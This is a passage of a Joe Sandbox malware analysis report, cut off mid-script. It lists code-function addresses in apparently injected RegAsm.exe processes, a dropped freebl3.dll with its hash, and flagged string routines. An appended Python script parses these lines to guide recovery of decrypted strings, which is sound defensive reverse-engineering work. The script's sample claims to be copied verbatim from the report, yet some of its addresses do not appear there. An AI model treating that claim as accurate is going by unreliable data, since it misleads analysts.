Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_0043D5DE 24_2_0043D5DE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_0041CDED 24_2_0041CDED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_00421DB5 24_2_00421DB5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_0042AE2B 24_2_0042AE2B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_0041E6C0 24_2_0041E6C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_0043F6F0 24_2_0043F6F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_004306F7 24_2_004306F7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_00406E80 24_2_00406E80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_00436E82 24_2_00436E82
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_00430EAE 24_2_00430EAE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_00401FC5 24_2_00401FC5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_00404FD0 24_2_00404FD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_00418FD5 24_2_00418FD5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_00402FE0 24_2_00402FE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_004357E0 24_2_004357E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_0042EF89 24_2_0042EF89
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_0043DF90 24_2_0043DF90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_004237A0 24_2_004237A0
Source: C:\Users\userIEHDAFHDHC.exe Code function: 27_2_00F00B20 27_2_00F00B20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_00419CF9 29_2_00419CF9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_00419333 29_2_00419333
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_00417F83 29_2_00417F83
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_6C9B35A0 29_2_6C9B35A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_6C9C6C80 29_2_6C9C6C80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_6C9F5C10 29_2_6C9F5C10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_6CA2AC00 29_2_6CA2AC00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_6CA02C10 29_2_6CA02C10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_6C9F0DD0 29_2_6C9F0DD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_6CA14EA0 29_2_6CA14EA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_6C9D5E90 29_2_6C9D5E90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_6C9BBEF0 29_2_6C9BBEF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_6C9CFEF0 29_2_6C9CFEF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_6C9F7E10 29_2_6C9F7E10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_6CA19E30 29_2_6CA19E30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_6C9D9E50 29_2_6C9D9E50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_6C9F3E50 29_2_6C9F3E50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_6CA02E4E 29_2_6CA02E4E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_6C9E6FF0 29_2_6C9E6FF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_6C9BDFE0 29_2_6C9BDFE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_6C9C9F00 29_2_6C9C9F00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_6C9F58E0 29_2_6C9F58E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_6CA04820 29_2_6CA04820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_6C9C7810 29_2_6C9C7810
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_6C9FB820 29_2_6C9FB820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_6C9D8850 29_2_6C9D8850
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_6C9DD850 29_2_6C9DD850
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_6C9ED9B0 29_2_6C9ED9B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_6CA12990 29_2_6CA12990
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_6C9BC9A0 29_2_6C9BC9A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_6CA0B970 29_2_6CA0B970
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_6C9CD960 29_2_6C9CD960
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_6C9CCAB0 29_2_6C9CCAB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_6CA2BA90 29_2_6CA2BA90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_6C9F8AC0 29_2_6C9F8AC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_6C9D1AF0 29_2_6C9D1AF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_6C9F9A60 29_2_6C9F9A60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_6CA134A0 29_2_6CA134A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_6C9DD4D0 29_2_6C9DD4D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_6CA1C4F3 29_2_6CA1C4F3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_6C9C64C0 29_2_6C9C64C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_6C9BD4E0 29_2_6C9BD4E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_6C9C5440 29_2_6C9C5440
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_6CA185F0 29_2_6CA185F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_6CA05600 29_2_6CA05600
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_6C9D4640 29_2_6C9D4640
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_6C9BC670 29_2_6C9BC670
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_6CA077A0 29_2_6CA077A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_6C9F7710 29_2_6C9F7710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_6C9E60A0 29_2_6C9E60A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_6C9DC0E0 29_2_6C9DC0E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_6C9BB001 29_2_6C9BB001
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_6CA1E000 29_2_6CA1E000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_6C9FF070 29_2_6C9FF070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_6C9F5190 29_2_6C9F5190
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_6CA2B170 29_2_6CA2B170
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_6C9B22A0 29_2_6C9B22A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_6C9FE2F0 29_2_6C9FE2F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_6C9BF380 29_2_6C9BF380
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_6C9FD320 29_2_6C9FD320
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_6C9CC370 29_2_6C9CC370
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_6CAFFC80 29_2_6CAFFC80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_6CA5ECC0 29_2_6CA5ECC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_6CABECD0 29_2_6CABECD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_6CA71C30 29_2_6CA71C30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_6CB26C00 29_2_6CB26C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_6CA6AC60 29_2_6CA6AC60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_6CA63C40 29_2_6CA63C40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_6CB89C40 29_2_6CB89C40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_6CA64DB0 29_2_6CA64DB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_6CA53D80 29_2_6CA53D80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_6CBA9D90 29_2_6CBA9D90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_6CAF6D90 29_2_6CAF6D90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_6CB31DC0 29_2_6CB31DC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_6CAC3D00 29_2_6CAC3D00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_6CB2ED70 29_2_6CB2ED70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_6CAE6E90 29_2_6CAE6E90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_6CA6AEC0 29_2_6CA6AEC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_6CA83EC0 29_2_6CA83EC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_6CB00EC0 29_2_6CB00EC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_6CBBBE70 29_2_6CBBBE70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_6CBE5E60 29_2_6CBE5E60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_6CAFEE70 29_2_6CAFEE70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_6CB8BE40 29_2_6CB8BE40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_6CBA8FB0 29_2_6CBA8FB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_6CA6EFB0 29_2_6CA6EFB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_6CA81F90 29_2_6CA81F90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_6CB0BFF0 29_2_6CB0BFF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_6CA60FE0 29_2_6CA60FE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_6CB7DFC0 29_2_6CB7DFC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_6CA95F20 29_2_6CA95F20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_6CA55F30 29_2_6CA55F30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_6CBB7F20 29_2_6CBB7F20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_6CA66F10 29_2_6CA66F10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_6CACEF40 29_2_6CACEF40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_6CA6D8E0 29_2_6CA6D8E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_6CA938E0 29_2_6CA938E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_6CBBB8F0 29_2_6CBBB8F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_6CAFF8C0 29_2_6CAFF8C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_6CAB0820 29_2_6CAB0820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_6CAEA820 29_2_6CAEA820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_6CABD810 29_2_6CABD810
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_6CB34840 29_2_6CB34840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_6CB209B0 29_2_6CB209B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_6CAF09A0 29_2_6CAF09A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_6CB1A9A0 29_2_6CB1A9A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_6CB31990 29_2_6CB31990
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_6CA71980 29_2_6CA71980
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_6CB7C9E0 29_2_6CB7C9E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_6CA949F0 29_2_6CA949F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_6CAC59F0 29_2_6CAC59F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_6CAF79F0 29_2_6CAF79F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_6CAF99C0 29_2_6CAF99C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_6CA999D0 29_2_6CA999D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_6CB15920 29_2_6CB15920
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_6CA98960 29_2_6CA98960
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_6CADF960 29_2_6CADF960
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_6CB1D960 29_2_6CB1D960
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_6CA5E950 29_2_6CA5E950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_6CA68AA0 29_2_6CA68AA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_6CADEA80 29_2_6CADEA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_6CA61AE0 29_2_6CA61AE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_6CB18A30 29_2_6CB18A30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_6CB01A10 29_2_6CB01A10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_6CB0EA00 29_2_6CB0EA00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_6CA9FA10 29_2_6CA9FA10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_6CADCA70 29_2_6CADCA70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_6CAB9BA0 29_2_6CAB9BA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_6CB00BA0 29_2_6CB00BA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_6CAA7BF0 29_2_6CAA7BF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_6CAABB20 29_2_6CAABB20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_6CA51B70 29_2_6CA51B70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_6CB8A480 29_2_6CB8A480
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_6CA614E0 29_2_6CA614E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_6CAA64D0 29_2_6CAA64D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_6CAFA4D0 29_2_6CAFA4D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_6CAC4420 29_2_6CAC4420
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_6CAEA430 29_2_6CAEA430
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_6CAED410 29_2_6CAED410
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_6CA78460 29_2_6CA78460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_6CA545B0 29_2_6CA545B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_6CA99590 29_2_6CA99590
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_6CB2A5E0 29_2_6CB2A5E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_6CAEE5F0 29_2_6CAEE5F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_6CAE55F0 29_2_6CAE55F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_6CBAF510 29_2_6CBAF510
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_6CAC7500 29_2_6CAC7500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_6CA75510 29_2_6CA75510
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_6CB00570 29_2_6CB00570
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_6CAC2560 29_2_6CAC2560
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_6CBA8550 29_2_6CBA8550
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_6CAB8540 29_2_6CAB8540
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_6CA916A0 29_2_6CA916A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_6CAC96A0 29_2_6CAC96A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_6CABE6E0 29_2_6CABE6E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_6CAFE6E0 29_2_6CAFE6E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_6CA846D0 29_2_6CA846D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_6CA56600 29_2_6CA56600
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_6CA89600 29_2_6CA89600
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_6CAD7610 29_2_6CAD7610
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_6CAB5640 29_2_6CAB5640
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_6CA79650 29_2_6CA79650
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_6CABC650 29_2_6CABC650
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_6CAEB7A0 29_2_6CAEB7A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_6CA57790 29_2_6CA57790
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_6CA8A7D0 29_2_6CA8A7D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_6CA83720 29_2_6CA83720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_6CAE0700 29_2_6CAE0700
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_6CACD710 29_2_6CACD710
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_6CA700B0 29_2_6CA700B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_6CB17090 29_2_6CB17090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_6CA58090 29_2_6CA58090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_6CAAB020 29_2_6CAAB020
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_6CB28010 29_2_6CB28010
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_6CB2C000 29_2_6CB2C000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_6CAAE070 29_2_6CAAE070
Source: Joe Sandbox View Dropped File: C:\ProgramData\freebl3.dll EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: String function: 0040AA20 appears 134 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: String function: 00404610 appears 317 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: String function: 6CBE09D0 appears 158 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: String function: 6CB7CBE8 appears 134 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: String function: 6CB894D0 appears 90 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: String function: 0040A310 appears 59 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: String function: 6CD709D0 appears 114 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: String function: 004020FD appears 287 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: String function: 6CBED930 appears 68 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: String function: 0041A3AC appears 77 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: String function: 6CBEDAE0 appears 77 times
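The per-process "Code function" and "String function" lines above are what an analyst mines before opening the unpacked 29.2.RegAsm.exe.400000.1.unpack dump. The following Python script is added here as an illustration; it is not part of the Joe Sandbox report or of Joe Sandbox's own tooling. It parses lines in that format, separates functions that sit inside the PE injected at 0x00400000 from those in DLLs mapped into RegAsm.exe, and ranks the flagged string routines by hit count so the hottest ones can be used as breakpoints when recovering the decrypted strings. The 0x00400000..0x00500000 image range is an assumption taken from the unpack names in this report and applies only to the RegAsm.exe processes; the embedded sample lines are copied from the report above.

```python
import re
from collections import defaultdict

# Assumed address split (see lead-in): the PE injected into RegAsm.exe is
# mapped at 0x00400000, so everything in this range is the payload itself;
# addresses above it (0x6C9Bxxxx ...) lie in DLLs mapped into that process.
IMAGE_LO, IMAGE_HI = 0x00400000, 0x00500000

CODE_RE = re.compile(
    r"^Source: (?P<src>.+?) Code function: "
    r"(?P<pid>\d+)_(?P<run>\d+)_(?P<addr>[0-9A-Fa-f]{8})\b"
)
STR_RE = re.compile(
    r"^Source: (?P<src>.+?) Code function: String function: "
    r"(?P<addr>[0-9A-Fa-f]{8}) appears (?P<n>\d+) times"
)

# Constructed sample: lines copied verbatim from the report above (RegAsm.exe
# processes 24 and 29 only, because the image-range assumption is theirs).
SAMPLE = r"""Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_0040CC80 24_2_0040CC80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 24_2_0043B050 24_2_0043B050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_00419CF9 29_2_00419CF9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_6C9B35A0 29_2_6C9B35A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 29_2_6CBE5E60 29_2_6CBE5E60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: String function: 0040AA20 appears 134 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: String function: 00404610 appears 317 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: String function: 6CBE09D0 appears 158 times
"""


def parse_report(text):
    """Return (code_functions, string_functions) parsed from report lines.

    code_functions:   list of (pid, run, address, source path)
    string_functions: list of (address, hit count, source path)
    Lines matching neither pattern are ignored.
    """
    code, strings = [], []
    for line in text.splitlines():
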